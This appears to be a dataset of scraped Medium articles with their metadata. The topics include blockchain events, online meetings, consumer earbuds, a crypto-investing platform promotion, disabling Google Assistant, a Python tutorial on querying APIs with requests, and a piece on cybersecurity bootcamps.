131 | QuarkChain CEO Qi Zhou Participated in LA Blockchain Summit and Joined Unfolding China’s Decentralized Finance Landscape Panel | QuarkChain CEO Qi Zhou Participated in LA Blockchain Summit and Joined Unfolding China’s Decentralized Finance Landscape Panel QuarkChain Oct 26 · 2 min read
LA Blockchain Summit was held on Oct 06 — Oct 07, 2020. This year’s summit was an online event. The Summit is the leading conference & expo focused on blockchain investing, building and mainstream adoption. It’s an exclusive, curated, high-impact informative and thought-provoking event presented by some of the world’s foremost innovators, change makers and prominent leaders in the blockchain ecosystem. Dr. Qi Zhou, QuarkChain’s founder and CEO, was invited to participate in the summit and presented his opinions at a panel discussion, chatting with the most accomplished, powerful and astounding list of industry leaders and speakers.
The panel Dr. Qi Zhou joined was “Unfolding China’s Decentralized Finance Landscape”. The discussion started with concerns about the constant rivalry, primarily between the US and China, but also with the rest of the world. The participants shared their opinions about competition in blockchain technology and why China would want to adopt a truly decentralized technology.
In the panel discussion, Qi Zhou introduced QuarkChain’s DeFi designs and features. He pointed out that a mature DeFi platform must have the following qualities: high efficiency, low gas fees, security, ease of use, and easy composability. He explained QuarkChain’s unique solution: Multi-chain Heterogeneous + DeFi + Multi-native tokens. Besides, Qi also introduced the design concept of Equalizer, an AMM DEX with equal and self-adjusting governance token distribution. It was the first DEX project that QuarkChain supported, and it enriches QuarkChain’s ecosystem.
To learn more details about the panel, please watch the video at: https://www.youtube.com/watch?v=7eHoqvb3H0E&list=PLFJJb69BM_KJhE-Z-1whIOASAkfTf2j_M&index=26&ab_channel=LABlockchainSummit | https://medium.com/quarkchain-official/quarkchain-ceo-qi-zhou-participated-in-la-blockchain-summit-and-joined-unfolding-chinas-27e9a5028e37 | [] | 2020-10-26 21:27:21.775000+00:00 | ['Blockchain Summit', 'Defi', 'Quarkchain', 'Blockchain Technology'] |
130 | Learning how to make online meetings more engaging | International technology standards not only promote best practices in efficiency, trustworthiness and safety, but also they are essential for the removal of technical barriers to trade. They are developed and agreed through a process of consensus that relies on at least some face to face meetings between engineers, scientists, regulators and other experts from all over the world. The COVID-19 pandemic has forced all of these meetings online, which presents challenges when hundreds of experts, most of whom are not native English speakers, come together to identify solutions.
The Australian, Mike Wood, understands these challenges better than most. Wood, who is based near Melbourne, chairs a committee (TC 106) that develops international standards on measurement and calculation methods to assess human exposure to electromagnetic fields. Their work helps governments and bodies like the World Health Organization to make important decisions about public health and safety. In his day job, Wood works for the telecommunications company, Telstra, as Principal for EME Strategy, Governance and Risk Management.
A priority for businesses and other organizations around the world, during the COVID-19 pandemic, has been to minimize the impact on public health while continuing to work, in order to limit disruption to the economy. For its part, IEC has been finding new ways to collaborate with an international network of more than 20 thousand experts, in order to continue vital standardization and conformity assessment work. IEC experts usually come together several times a year, in hundreds of different committees and working groups, for essential face to face meetings that not only build working relations, but also help them to reach consensus decisions.
In a revealing interview, Wood offers a rare look behind the scenes. He identifies some of the challenges that experts are currently facing, including the very different situations in the many countries where they are based. He also explains how TC 106 has focused on supporting its people and has striven to make its meetings more social.
Q: The pandemic has had a massive impact on travel and the way we work. What are the challenges of chairing a meeting when it is online?
A: A lot of technical committees and a lot of teams rely on meeting face to face a number of times each year. The remote sessions build on that, but you’ve already got the rapport. When you’re facilitating and chairing a pure remote meeting, you can’t read the room as well if there’s no visual contact. People may not be as engaged. You’re really down to just talking about some technical content, but you can’t really engage with people on a personal level.
When you’ve got some video connection, at least you can see people and people are more engaged in the content. But of course, you can’t have a coffee break, or sit down for a face to face discussion. It’s difficult to structure the meeting in a way that you can deal with certain topics, have a break, take some issues offline and have some further one on one discussions.
The advantage of face to face meetings is that you can address a range of different aspects of your work in a range of different manners. When you’re just online, things really change — typically, most online meetings focus on one or two particular areas. But we’re in a situation this year where we don’t have a choice. It’s a case of finding out what does and doesn’t work. Of course, what works for some teams might not work for others.
Q: You recently had your first online technical meeting this year. What worked for you?
A: Yes, we were due to all meet in Canada in April but converted the series of Working Group and Project Team meetings to occur the same week but all online. One of the best parts of it was a virtual coffee break in one of the larger Working Groups, where we stopped for 15 or 20 minutes and we just went around the group. There were 30-odd people and we were just talking like we were sitting next to each other and sharing not our work, but just sharing our local experiences. You could see the room ‘light up’, you could see the faces get more engaged. The meeting changed after that because people were actually more engaged in the overall process.
Hats off to the convenor of that particular session because it was a very warming atmosphere. I’ve taken part in meetings where you’re just talking technical content and you can lose concentration. There’ll be some things that work really well, while some things will be real challenges. As leaders, it’s up to us to read the room and structure the meeting so that we can engage with people.
Q: In terms of keeping everyone engaged, what is the most common problem you encounter and what’s the solution?
A: When there’s a lot of people, you also need to reach out to those that aren’t speaking. Some people with English as a second language might not contribute as much online, whereas in a face to face meeting, you can have separate discussions.
I think we’re all going to learn. One of the groups I like to turn to in these sorts of scenarios are our IEC Young Professionals because they’ve grown up online and do a lot of their work online. We’re going to learn a lot from them too. But, as chairs, we should also speak to each other and come up with ideas that work and focus on the things that are going to really help us this year.
Q: Would I be right in thinking that project work is easier because you have always done a lot of that online?
A: You certainly are right. We’re used to that. You’ve got a dedicated set of tasks and you’ve got actions and one step leads to another. A lot of companies do it online. In Australia, for example, we have online and video meetings every single day.
The challenge is when you’re setting up projects and you’ve got a team discussion where you’re reviewing comments on a committee draft, or a document that requires some in-depth conversation. That’s not just routine. The convenor and the facilitators have to have personal skills. How do we do that online? Do we make some smaller groups? For example, if a national committee has a number of issues with how something is been drafted, do I actually meet with them first? Because in a large group you might find that they’re not speaking up and some other country is dominating the discussion.
So, it may be that we structure the way we do it differently and I think we’re going to learn a lot of this kind of thing this year. I’m excited about what we can learn. But we’ve really got to look after our people. That’s what I wrote to my Technical Committee, TC 106, just prior to our meeting. We are a virtual family. We’ve got to look out for ourselves, look after ourselves and support each other through this.
Q: In practical terms, what does “supporting each other” mean?
A: If you look at the IEC and the experts, we’ve got regulators, we’ve got test houses, we’ve got operators, and we’ve got academia. We come from diverse backgrounds, but we’re a global family. In the meetings we had recently, we had every single continent represented. It means respecting that. We’re experiencing the COVID-19 issues and lockdowns differently. Our emotions are going to be very different. I sometimes wake up wondering what’s going on in this world. It’s taking me a while to come to grips with what’s actually happening. In Australia, we’re very, very lucky with our current situation. I look at the US, I look at Europe and it’s so different.
Then, when you talk to people, you can tell that some people are just feeling really down about being locked in an apartment, or not being able to see their family. But when you’ve got these virtual meetings, we don’t need to talk only about the technical content. We can just park that for a bit and ask someone how they’re doing. We can have a separate discussion and reach out to them. They are our connected family. So to me, that’s probably the most important thing.
If we can help people in that journey, then they’ll want to be part of the ongoing discussions. Some people might switch off and say that they’re doing voluntary work and it will have to take a backseat. And that’s fine if it happens, but how can we help?
It’s our great IEC family first. Then it’s about not trying to do as much as we normally do in our meetings but kicking off with the tasks that we can do and prioritizing. I think in some cases we may achieve more! Convenors need to step back and think about how they’re going to get their projects to work with these circumstances. You might not have all the answers, so reach out to another convenor. We — the technical committee chairs and the other group chairs — can leverage some of this information and share it. | https://medium.com/e-tech/learning-how-to-make-online-meetings-more-engaging-f889ffad1293 | ['Mike Mullane'] | 2020-06-09 13:30:37.599000+00:00 | ['Management', 'Covid 19', 'Technology', 'Zoom', 'Online Meetings'] |
131 | Five Stories to Refresh Your Digital Health Knowledge Before the Global Digital Health Forum 2016 | The annual Global Digital Health Forum is just around the corner. Now is the time to brush up on some of the trends in digital health thought leadership and programming.
Here are five stories written by staff from the Knowledge for Health (K4Health) Project that will keep you informed on conversations happening at the Forum this year:
Earlier this year, K4Health’s Digital Health Team shared why they view knowledge management as an essential tool for fostering country ownership of digital health.
2. K4Health IT Director Guy Chalk (guychalk) demystifies open-source software and discusses why it’s important for international development.
3. Lisa Mwaikambo, K4Health’s Director of Knowledge Management Integration, shares lessons she learned implementing a closed user group platform for health providers in Tanzania to share technical health content.
4. Program Specialist Amy Lee explores a common assumption that women have less access and are less likely to use internet technology and finds out it isn’t always true.
5. Sarah V. Harlan, K4Health’s Learning Director, reminds us to focus first on the people our policies and programs affect, regardless of how incredible or simple a technology solution might seem.
132 | I Tried Knock-Off Apple AirPods | Photo by Howard Bouchevereau on Unsplash
I wanted to know if Apple AirPods are really worth the investment. So, I tried a pair of knock-off wireless earbuds to see how they measured up. Here’s what I discovered.
The knock-off earbuds have a cheaper, less luxurious feel
When I opened up my package of $35 True Wireless Ear Buds, I immediately noticed that both the earbuds and the plastic casing have a cheaper feel to them. The plastic is thinner and it feels flimsier overall than the Apple AirPods. However, for the cost, this was to be expected, and it wouldn’t be a deal-breaker for me.
The charging cases and earbuds are almost identical in style
Side by side view of my Apple AirPods (left) and my pink knock-off wireless earbuds
When you look at the two pairs side by side, there are very few differences. The front of the charging case for the knock-off earbuds has four indicator dots to show how charged up the case is. The AirPods have a single indicator dot on the interior of the case which indicates whether the charging case is fully charged or not.
The knock-off earbuds come in a variety of colors. I chose baby pink, but they also offered classic white, which looks identical to the AirPods. There is a button on the back of the AirPods case which helps the earbuds pair with your device. Everything else looks pretty much the same. Both sets of earbuds connect magnetically into the charging case.
Side by side view of the back of the charging cases
The sound quality between the two pairs is noticeably different
Not unexpectedly, the sound quality of the Apple AirPods is noticeably superior to the knock-offs. I used each pair on a number of runs outside, and the exterior noise was louder with the knock-off earbuds, especially on days when it was windy. However, taking into account that there is a $100+ difference in cost between the two pairs, I was actually surprised that the sound quality of the knock-off pair was as good as it was. The earbuds never lost signal or cut in and out. The sound quality was simply not as clean nor as smooth as that of the AirPods. Even so, given the price, the sound quality of the knock-offs was acceptable.
Side by side view of the earbuds
The AirPods show the percent battery life left
This feature is one that I wish my knock-off headphones would have had. The AirPods indicate the percentage charged for each earbud on your paired device. For example, when you open up the Apple AirPods charging case, the percent charge of each earbud shows up on your phone screen. With the knock-off earbuds I purchased, there is no way of knowing how charged up they are. My knock-off earbuds have actually died a few times while I was out running because I failed to charge them up and was unaware that they needed recharging.
There are some key differences in the specifications
Now, let’s take a deeper dive into the specifications of the Apple AirPods (I have version 1) vs. the knock-off earbuds (True Wireless Ear Buds). Both the AirPods and the knock-off earbuds have automatic on/off and pairing capabilities. They both have touch controls for the phone and music. They each support up to 5 hours of listening time for a single charge and transmit up to about 30 feet. However, there are some differences. The AirPods charge about 4 times as fast. They take only 15 minutes to charge up enough for 3 hours of listening time, whereas the knock-offs take 1–2 hours to charge. The AirPods have access to Siri. Finally, the audio and noise-cancelling capabilities of the AirPods are superior to that of the True Wireless Ear Buds. All of these added features are what elevate the Apple AirPods above other less expensive wireless earbuds on the market.
Knock-off earbuds package specifications
So, what’s my final verdict?
The Apple AirPods are undeniably a superior pair of headphones. However, if you are not super picky about sound quality and don’t need all of the extra bells and whistles, then a knock-off pair of headphones will work just fine for you. They’ll also save you a lot of money. What it really comes down to is your personal preference and how much use you think you’ll get out of them. If you plan to use them every day, then it may be worth investing in the Apple AirPods. Otherwise, I think you could be perfectly happy buying a decent pair of knock-offs and saving yourself $100. | https://medium.com/adventures-in-consumer-technology/i-tried-knock-off-apple-airpods-dadb13ab483 | ['Alyssa Atkinson'] | 2020-05-18 14:24:17.085000+00:00 | ['Apple', 'Business', 'Tech', 'Electronics', 'Technology'] |
133 | How to Easily Invest in the Cryptocurrency Market | Despite the cryptocurrency market continuing its rapid growth process in 2018, the industry still has a wall of problems to break down between its current state and successful, widespread public adoption. These issues stem from the prevalence of fraudulent ICO’s, frequent security breaches and the inefficient nature of current ‘on-ramps’ from traditional fiat currency into cryptocurrency. Participation in the cryptocurrency market in its current state remains a high-risk, high-reward endeavour without the possession of exceptional technical and financial skills. While ETFs and licensed financial advisors provide solutions to these problems in traditional markets, no entity currently exists in the cryptocurrency space that offers bespoke, risk-optimised portfolios to the retail market. Until Automata.
U.K-based fintech company Automata seeks to address the problems that I have laid out above and have consequentially created a product that allows anyone, from farmer to fund manager, to invest in the surging cryptocurrency market. The beauty of Automata is found in its elegant simplicity. Automata does not require the exchange of cryptocurrencies, nor does it limit users to a highly restricted selection of cryptocurrencies as is currently seen with major companies that specialise in fiat to cryptocurrency ‘on-ramping’. Users simply create an account, answer a short series of questions in order to allow Automata to create a personalised risk profile and you’re ready to invest. Deposits can take the form of a one-off investment or can be scheduled to suit the user’s personal preference, which is a testament to Automata’s focus on developing a product that is not only easy to use, but also consumer-minded. Additionally, deposits can be as little as £1 and adjusted simply if a user’s preference changes over time. When put into a cryptocurrency context, it becomes clear just how important a user-friendly project like Automata is in finally achieving the widespread adoption of cryptocurrency to the global public.
While the interface and transaction framework must be applauded for their ease of use, the technical element of what Automata achieves is far from simplistic. Automata uses a range of fundamental and technical analysis, together with analysis of overarching market forces, to formulate a proprietary algorithm capable of outperforming traditional investment strategies in both bull and, more importantly, bear markets. It does so by adjusting individual users’ risk exposure depending on the overarching market trend, with an investment having greater exposure to a greater number of cryptocurrencies in an established bull trend and a smaller level of exposure to cryptocurrencies (and therefore a higher percentage held in stable cryptocurrencies and fiat currency) in the event of an identifiable bear trend. This algorithm has been tested extensively by the Automata team in traditional markets, where it experienced great success, but also in the cryptocurrency market, where it showed an ability to outperform standard market strategies by upwards of 80% in an established bear trend. As mentioned previously, this ability to mitigate risk and protect a client’s investment is not insignificant in a cryptocurrency market that is both highly volatile and rampant with attempted fraud. In this respect, Automata is essentially unique, as it dramatically reduces the potential downside of any capital outlay, to the point where traditionally frugal investors, renowned for being reluctant to move any money from traditional blue-chip stocks, should be attracted to entering the cryptocurrency market. As a result, it would be logical to suggest that Automata could act as the true catalyst required for mass retail investment into the cryptocurrency space and a significant step towards enabling the financial independence of those who may not otherwise have had the opportunity in traditional markets.
Automata’s current roadmap suggests that this disruption isn’t as far away as might be expected. The Alpha version of Automata’s platform has been completed and the Beta version is currently in testing, with an eye to releasing the completed desktop version in Q3 of 2018 and the fully operational smartphone application by Q4 2018. In addition to this, the comprehensive whitepaper is in the final stages of editing and due for dissemination in the coming weeks. This whitepaper will outline the token economics of the Automata project in detail, as well as explaining more about the trading platform itself. If rumours are to be believed, the incoming whitepaper will also reveal that Automata is seeking to create an environment in which users can track leading portfolio manager’s investment choices and replicate them to mirror their own personal portfolios through a specialty smart contract. Leading portfolio managers will set their own fees and be rewarded in Automata’s native token if they have success.
The cryptocurrency market is not easy. The possibility for high-upside investing is not without its inevitable counter side lurking darkly around the corner. The revolutionary blockchain technology that lays the foundation for cryptocurrencies however, is an opportunity that simply cannot be missed. Automata takes this high-risk, highly liquid and immature cryptocurrency market and simplifies it. Suddenly, instead of having to navigate exchange after exchange (and the fees that come them), with Automata users have a tailored, risk managed platform that allows users to access all of this at the tips of their fingers and without the notable security risks that come with trading individually. Automata is a brilliant solution to one of the cryptocurrency’s biggest existing problems. | https://medium.com/automatalive/how-to-easily-invest-in-the-cryptocurrency-market-de3cc72e4022 | [] | 2018-06-26 13:46:16.116000+00:00 | ['Investment', 'Technology', 'Fintech', 'Cryptocurrency', 'Bitcoin'] |
134 | Loom PlasmaChain Staking เปิด Live แบบเต็มรูปแบบ! — การ Stake ให้กับ LOOM และเพิ่มความปลอดภัยให้กับ PlasmaChain | in Both Sides of the Table | https://medium.com/loom-network-thai/loom-plasmachain-staking-%E0%B9%84%E0%B8%94%E0%B9%89%E0%B9%80%E0%B8%9B%E0%B8%B4%E0%B8%94-live-%E0%B9%81%E0%B8%9A%E0%B8%9A%E0%B9%80%E0%B8%95%E0%B9%87%E0%B8%A1%E0%B8%A3%E0%B8%B9%E0%B8%9B%E0%B9%81%E0%B8%9A%E0%B8%9A%E0%B9%81%E0%B8%A5%E0%B9%89%E0%B8%A7%E0%B8%84%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%9A-%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%97%E0%B8%B3-stake-%E0%B9%83%E0%B8%AB%E0%B9%89%E0%B8%81%E0%B8%B1%E0%B8%9A-loom-de1a9de73e83 | ['Loom Network Thai'] | 2019-03-01 04:25:53.757000+00:00 | ['Blockchain', 'Cryptocurrency', 'Ethereum', 'Technology', 'Bitcoin'] |
135 | Learn how to turn off your Google Assistant | Learn how to turn off your Google Assistant
Google Assistant is one of the most feature-rich virtual assistants in the world. The Assistant is always ready on every Android phone, tablet and Google Home series device to help users with their daily work. However, not everyone wants to use Google Assistant, and there is no reason to let it needlessly consume the device’s RAM, processing power and battery. In that case, Google Assistant can be turned off if you want.
To turn off the Assistant, first open the Google app on the phone. Then tap the More button (the three-bar icon) in the upper right corner and go to Settings. From there, select Google Assistant, scroll down and touch the General option. Then remove the tick mark from the Google Assistant option there. Google will present some warning messages to the user; it is safe to dismiss them. With that, both Google Assistant and the phone’s always-on microphone listening for the phrase ‘OK Google’ will be off.
However, if you do not want to shut Google Assistant down completely, you can just stop it from appearing on ‘OK Google’ detection or on a press of the home button. Google Assistant can otherwise launch for no reason, such as when it mistakes another word for ‘OK Google’ or when the home button is pressed unintentionally, which can be embarrassing. In that case, go to the phone’s settings menu. From there, go to the Apps (or Applications) option and then to the Default applications option. After removing Google Assistant from the Device assistant option and selecting ‘None’, Google Assistant will no longer appear after hearing the phrase or after a button press.
The benefits of turning off the Assistant can be greater on older devices than on newer ones. On devices running Snapdragon 400 or 800 series processors, or on phones more than three years old, the Assistant may consume extra battery. Google Assistant has a hand in reducing battery life, especially on standby. So on such devices it is better to turn it off.
136 | How to Get Data from APIs with Python 🐍 | It’s a bit of a cliche to say that data is the new oil. I like to think of it more as a renewable resource like wind.💨 Whatever energy source you choose as your metaphor, you want to harness some of its power! ⚡️
Ideally, you have direct access to the data you want in a file or a database you control. When that’s not the case, if you’re lucky, the data will be available through a public-facing API. ☘️
In this article, I’ll show you the steps to get the data from a public API using Python. 🐍 First I’ll show you how and where to look for a Python API wrapper and share the largest repository of Python API wrappers. 🎉
Then I’ll show you how to use the requests library to get the data you want from an API that doesn’t have a Python wrapper.
If the data you want is on a website, but not available through a public-facing API, there are several options for scraping it. When to use which scraping package is a whole other article I have in the works. Follow me to make sure you don’t miss it! 😁
Let’s drill down!
Already drilled. Source: pixabay.com
APIs
An external facing Application Programming Interface (API) is often intended to provide data in large chunks. You just need to know how to work with the API.
An organization creates a public-facing API with the intent that you use it. Their motivations vary from idealistic to mercenary and might include the following:
Hoping you’ll build something that will improve the world. 🌍 Hoping you’ll use their free plan and then need so much data or need the data so frequently you’ll pay them for access to more data. 💵 Figuring you’ll scrape the data from the website if they don’t give you a direct line to it, so they might as well reduce their server overhead and make your experience better. 😀
APIs can be documented well, poorly, or somewhere in between. If you’re lucky, they are well-documented. If you’re really lucky there is a Python wrapper for the API that works and is well documented. 🎉
Finding Python API Wrappers
It can be tricky to find Python wrappers for the API you need. Here’s my suggested approach.
List of Python API Wrappers
I am maintaining what I believe is the largest list of Python API wrappers over at GitHub. Real Python made a nice list that was forked and updated by johnwmiller. I cleaned the list up a bit and then, given that coronavirus quarantine ended my children’s ability to earn money from soccer refereeing ⚽️ and cat sitting 🐈, I paid them to help improve the list. We updated and augmented this outdated list because I couldn’t find a good list of functioning API wrappers elsewhere. 😀
If you find a Python API wrapper that is missing from the list, please edit the ReadMe file and submit a pull request. Here’s a quick guide to editing GitHub Markdown files in the GUI, if you’re new to this:
Click the pencil icon in the right corner and make changes (here’s a lovely Markdown tutorial if you need it). Then click the green Propose file change button at the bottom of the page. Then click on the green Create pull request button, summarize the changes, and click on the green Create pull request button at the bottom. Thank you! 🎉
FYI, I often highlight Python packages on my Data Awesome mailing list. In the next installment I’ll be highlighting yfinance by Ran Aroussi. yfinance wraps the Yahoo Finance API. You can use it to read stock market data into a pandas DataFrame with one line of code. 🚀
If the Python API wrapper list doesn’t have what you need, I suggest you use the usual method for finding things on the interwebs. 🕸
Google it
A good search engine is a developer or data scientist’s best friend 😁
Specifically, I would search for Python wrapper the_name_of_the_api_I’m_looking_for. GitHub links are likely to be the most fruitful. If a repo hasn’t been updated in the past several years or has been archived, your odds of being able to successfully use the wrapper aren’t high. In that case, I suggest you keep looking. 👓
Check the API website
If you’re lucky, the website for the API you are using might list wrappers available in various programming languages. It’s worth a try. 😃
Using an API Directly
When there isn’t an API wrapper, you have to query the API directly. I suggest you use the Python requests library.
Use Requests
The venerable requests library is the battle-tested way to get information from an API. Requests was created by Kenneth Reitz and is protected by the Python Software Foundation. It’s the most downloaded Python package as of this writing. 👍
Install requests into your environment from the command line with pip install requests
Then import it and use it. Use the HTTP verbs get and post as methods to return the information you desire. Mostly, you’ll use get. Here’s how to query the GitHub API:
import requests

r = requests.get('https://api.github.com/events')
You can pass parameters to the get method as a dictionary. Here’s the quick start guide.
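To see what that parameter dictionary turns into, here’s a small sketch that builds a request without sending it. The endpoint and parameter names here are just illustrative, but the encoding behavior is real:

```python
import requests

# Build (but don't send) a GET request to inspect how `requests`
# encodes a parameter dictionary into the query string.
params = {"q": "python wrapper", "per_page": 5}
prepared = requests.Request(
    "GET", "https://api.github.com/search/repositories", params=params
).prepare()

print(prepared.url)
```

Because nothing is actually sent, this is a handy way to check the exact URL your code will hit before spending a request against a rate limit.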
You’ll often get back JSON when you make a get request. You can use the requests .json() method to change JSON into a dictionary quickly.
my_dict = r.json()
Refining data queries with requests is much faster than refining oil 😀 Source: pixabay.com
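Once the JSON is a plain dictionary, you navigate it with ordinary key and index lookups. Here’s a tiny sketch using a made-up payload; a real API will have its own structure, so check its docs:

```python
import json

# A made-up payload resembling what an API might return.
payload = '{"items": [{"name": "requests", "stars": 50000}]}'

# json.loads() gives the same kind of object as r.json(): a plain dict.
data = json.loads(payload)
first_name = data["items"][0]["name"]
print(first_name)  # → requests
```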
Requests uses the urllib3 library under the hood and enhances it. There are other libraries you could use, but requests is super solid, is nice to use, and is familiar to most Python coders. I suggest you use requests whenever you want to make an API call and the API doesn’t have a Python wrapper.
Speaking of which, if your favorite API doesn’t have a Python wrapper, I encourage you to consider making one. 👍
Making a Python API Wrapper 🛠
Making an API wrapper is a great way to learn Python packaging skills. Here’s a guide I wrote to get you started with making a Python package and releasing it on PyPI.
I created Pybraries, a Python wrapper for the Libraries.io API. Making it was a great learning experience, and it was cool to give back to the open source community that I’ve benefited from. 🚀
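If you’re curious what a wrapper looks like on the inside, the general pattern is a class that holds a requests.Session, injects authentication once, and exposes endpoints as methods. The sketch below is an illustrative toy, not the Pybraries code:

```python
import requests


class GitHubClient:
    """A minimal, hypothetical sketch of an API wrapper."""

    BASE = "https://api.github.com"

    def __init__(self, token=None):
        # A Session reuses connections and carries headers on every call.
        self.session = requests.Session()
        if token:
            self.session.headers["Authorization"] = f"token {token}"

    def events(self):
        """Return recent public events as parsed JSON."""
        r = self.session.get(f"{self.BASE}/events")
        r.raise_for_status()  # turn 4xx/5xx responses into exceptions
        return r.json()
```

A user then writes `GitHubClient(token).events()` instead of remembering URLs and headers, which is most of what a wrapper buys you.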
Other Things You Should Know about APIs
API keys, rate limits, and cURL are three other terms you should be familiar with.
API keys 🗝
You’ll often need an API key to query the API. The API docs should make it clear how you can procure a key. Most of the time, you can get one for free by signing up at the website of the organization whose data you want. If you want a lot of data or want it frequently, you might have to pay for the privilege.
Keys. Source: pixabay.com
You can store your API key in an environment variable. Here’s a guide for setting up environment variables on Mac, Linux, and Windows. Environment variable names are ALL CAPS by convention. Speaking of all caps:
⚠️ DO NOT, UNDER ANY CIRCUMSTANCES, STORE AN API KEY IN GITHUB OR ANOTHER PUBLICLY ACCESSIBLE ONLINE VERSION CONTROL SYSTEM. ⚠️
Your key could get stolen and abused — especially if your account has a credit card attached to it. ☹️
To access the environment variable that holds your API key in Python, import the os module and get the value from the dictionary with the key that matches the name of your environment variable. For example:
```python
import os

os.environ.get('MYENVIRONMENTVARIABLE')
```
This code returns the value of your MYENVIRONMENTVARIABLE environment variable.
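A minimal sketch of that lookup; the variable is set in-process here only so the example is self-contained (in practice you’d export it from your shell, and the name and value below are placeholders, not a real key):

```python
import os

# Simulate `export MYENVIRONMENTVARIABLE=not-a-real-key` from your shell
os.environ['MYENVIRONMENTVARIABLE'] = 'not-a-real-key'

api_key = os.environ.get('MYENVIRONMENTVARIABLE')
print(api_key)  # → not-a-real-key

# .get() returns None (or a default you supply) for a missing name,
# instead of raising KeyError the way os.environ['...'] would
print(os.environ.get('NO_SUCH_VARIABLE', 'fallback'))  # → fallback
```

The .get() behavior is handy when code should degrade gracefully if a key hasn’t been configured yet.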
If you will be using your key in applications on the cloud, you should look into secrets management, as discussed here.
Speaking of staying out of trouble, let’s discuss rate limits.
Rate Limits
Need to limit it. 😲 Source: pixabay.com
Many APIs limit how many times you can ping them in a given amount of time to avoid needing to pay for lots of extra servers. To avoid going over these limits, you can use the Python time library and put your request into a loop. For example, here’s a brief snippet of code that waits for five seconds between requests.
```python
import time
import requests

t = 0
my_url = 'https://example.com'

while t < 100:
    r = requests.get(my_url)
    time.sleep(5)  # wait five seconds
    t += 1
    print(r.json())
```
The point of this code is to show you how you can use time.sleep() to avoid nonstop API endpoint pings that might push you over a rate limit. In a real use case, you would probably want to save your data in some way and use a try…except block.
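A sketch of what that fuller shape might look like; fetch below is a hypothetical stand-in for requests.get(url).json() so the example runs offline, and events.json is just a throwaway local file:

```python
import json
import time

def fetch(url):
    """Stand-in for requests.get(url).json(); swap in the real call in practice."""
    return {'url': url, 'event': 'demo'}

results = []
for t in range(3):                    # far fewer iterations than the loop above
    try:
        results.append(fetch('https://example.com'))
    except Exception as exc:          # with requests, catch requests.RequestException
        print(f'request {t} failed: {exc}')
    time.sleep(0)                     # use time.sleep(5) against a real API

# Persist as you go so a crash doesn't cost you everything collected so far
with open('events.json', 'w') as f:
    json.dump(results, f)

print(len(results))  # → 3
```

The try…except keeps one failed request from killing the whole run, and writing to disk each pass means a rate-limit ban mid-loop doesn’t lose the data you already pulled.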
cURL
This is a guide for using Python with APIs, but you should know that you can query an API from the command line with the popular cURL program. cURL is included on Macs and machines running recent Windows 10 versions by default. If you want to learn cURL, I suggest you check out the free ebook Conquering the Command Line, by Mark Bates. 🚀
Recap
If you want to get data from an API, try to find a Python wrapper first. Check out the list of Python wrappers here. Google search if that fails, and check out the API website. If you find a Python wrapper missing from my list on GitHub, please add it. 😀
If there isn’t a Python wrapper for an API, use the requests library. If you have the time, consider creating a wrapper so all Python users can benefit. ❤️
Don’t forget to keep your API keys safe and avoid hitting rate limits. 🔑
Wrap
You’ve learned a workflow for finding and using APIs with Python. You’re on your way to getting the data you need to do awesome things! 🚀
I hope you found this guide to using APIs with Python useful. If you did, please share it on your favorite social media so other folks can find it, too. 👍
I write about Python, SQL, Docker, data science, and other tech topics. If any of that’s of interest to you, follow me and read more here. 😀 | https://towardsdatascience.com/how-to-get-data-from-apis-with-python-dfb83fdc5b5b | ['Jeff Hale'] | 2020-05-03 12:36:42.933000+00:00 | ['Technology', 'Python', 'Data Science', 'Programming', 'Towards Data Science'] |
137 | Artificial Intelligence: Week #52 | 2020 | Artificial Intelligence: Week #52 | 2020
Happy Holidays from Sixgill:
As many of us will be full of holiday cheer next week, this will be our last weekly AI post of 2020. Thank you for reading, and I hope you’ve enjoyed staying up to date on artificial intelligence and machine learning with us. We look forward to posting in the new year!
Enjoy our 12 Days of Labeling Holiday Video:
Use promo code: HOLIDAY2020 to get 60 days free of Sense Data Annotation. No card required.
Photo by Derek Truninger on Unsplash
Artificial Intelligence News:
Listen to this deep learning model jam out in an infinite bass solo on a YouTube live stream. The model was trained by Dadabots on an original two-hour improvised bass solo by Adam Neely. I’m ready for more interesting new AI music.
DeepMind continues to push the boundaries of what’s possible with AI. MuZero can learn to play games like Go, chess, shogi, and Atari without even being told what the rules are. MuZero can navigate unknown environments and develop strategies that fit. This is a major milestone in DeepMind’s pursuit of general-purpose AI algorithms.
Learn how this robot can overcome issues and adapt to new environments with something called “Hebbian learning.”
Check out some thoughts published on Forbes about what’s to come in 2021 for the AI field.
138 | McDonald’s, Spherical Cows, and iTunes: A Defense on Behalf of Bootcamp Instructors & Thoughts on Modular Education | I sometimes participate in an alumni Discord server, where we recently had a bit of heated debate regarding the value of our bootcamp program and what we wish could have been different. Two major themes were:
1. The training on its own was not sufficient/rigorous enough to make us “job-ready” relative to the inflated expectations of the hiring market.
2. The career paths laid out, “penetration tester” and “SOC analyst” and “Red Team” vs “Blue Team”, felt binary in an industry that is filled with niches.
I would like to take some time to exercise some empathy on behalf of our instructors who have been taking a lot of flak as well as suggest an alternative that might be a compromise between student and shareholder value.
お任せ — “I’ll Leave it up to You”
Jiro Dreams of Sushi
This is literally what you are asking for when you order o-makase, the prix fixe of sushi. The chef and their staff are sourcing fish by season and market conditions, and you are leaving your dining experience at their discretion.
When you choose to attend a security, web development/UX, or data science bootcamp, that is essentially what you’re doing. You can, of course, take individual classes on how to write Python or how to conduct a penetration test, just like you can choose to order sushi a la carte or make it yourself if you wish. But if you’re considering a bootcamp, like I did, most likely you are admitting that you do not have the Herculean research and self-discipline abilities to bootstrap yourself from ground zero to a job.
But that’s ok, because most of us don’t. It’s likely why, even though you can have some flexibility in the classes you can enroll in, university curriculums are fairly fixed in a way to guide you through the path you need. Don’t give into the survivorship bias of those who brag about figuring things out by themselves — no one is telling the story about how they burned out on their own and gave up.
So if you have the cash or are game to take on loans (like someone paying with a credit card at Sushi Nakazawa), you can accept the help of veteran industry professionals who have taken the time to craft a curriculum for the average student who likely knows close to nothing. Getting somewhere at a cost is often better than nowhere, depending on your needs and constraints.
I left it up to the faculty at Fullstack Academy, and I’m better off for it.
The “Tyranny” of the Majority (or Neoliberalism)
The hidden double edge in this Faustian pact lies in the fact that to serve the business growth needs of an investor-backed enterprise, the product offering must appeal to as wide of a market as possible. And who is this market?
Those who want to change careers quickly, with little/no prior background, at a lower cost than an undergraduate/graduate program.
In the eyes of the shareholders, we (prospective bootcamp students) are not some struggling inner-city high schoolers reaching for a better future by learning AP Calculus — we are a statistic that makes the Series A/B/C funding worth it. It’s a data-driven world, and money makes it go ‘round.
